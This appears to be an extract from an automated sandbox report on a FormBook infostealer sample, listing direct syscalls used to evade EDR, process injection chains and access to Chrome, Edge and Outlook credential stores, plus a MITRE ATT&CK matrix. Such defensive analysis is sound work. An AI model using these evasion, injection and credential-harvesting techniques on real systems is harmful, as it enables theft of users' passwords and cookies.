            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov ecx, dword ptr fs:[00000030h]2_2_03452835
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00426DA1
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0042202E SetUnhandledExceptionFilter,0_2_0042202E
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004230F5
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00417D93
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00421FA7

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\BL.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\schtasks.exeThread register set: target process: 5900Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\schtasks.exeThread APC queued: target process: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\BL.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 28E4008Jump to behavior
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
            Source: C:\Users\user\Desktop\BL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BL.exe"Jump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
            Source: OmmtmfniIsg.exe, 00000003.00000000.2294245702.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4644002984.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452742704.0000000000D31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: BL.exe, OmmtmfniIsg.exe, 00000003.00000000.2294245702.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4644002984.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452742704.0000000000D31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: OmmtmfniIsg.exe, 00000003.00000000.2294245702.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4644002984.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452742704.0000000000D31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: BL.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: OmmtmfniIsg.exe, 00000003.00000000.2294245702.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4644002984.0000000000ED1000.00000002.00000001.00040000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452742704.0000000000D31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0042039F
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: BL.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: BL.exeBinary or memory string: WIN_XP
            Source: BL.exeBinary or memory string: WIN_XPe
            Source: BL.exeBinary or memory string: WIN_VISTA
            Source: BL.exeBinary or memory string: WIN_7

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4642083493.0000000000430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4645149295.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374333248.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4645447566.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4645860637.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4649388492.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374622096.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		3
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Scheduled Task/Job            		2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
